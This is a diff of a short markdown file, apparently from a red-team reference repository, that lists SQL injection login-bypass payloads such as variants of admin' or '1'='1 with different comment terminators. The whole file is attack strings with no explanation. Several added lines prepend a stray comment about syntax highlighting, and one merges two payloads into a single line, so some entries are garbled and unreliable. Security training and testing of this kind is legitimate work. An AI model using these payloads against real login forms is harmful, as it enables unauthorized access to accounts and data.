CedarvilleCyber/RedTeamVault/Tooling/Enumeration/Sqlmap.md

 admin' or '1'='1'--
 admin' or '1'='1'#
 admin' or '1'='1'/*
-admin'or 1=1 or ''='
+*/ -- Close to fix syntax highlighting admin'or 1=1 or ''='
 admin' or 1=1
 admin' or 1=1--
 admin' or 1=1#
 admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
+*/ -- Close to fix syntax highlighting admin') or ('1'='1 admin') or ('1'='1'--
 admin') or ('1'='1'#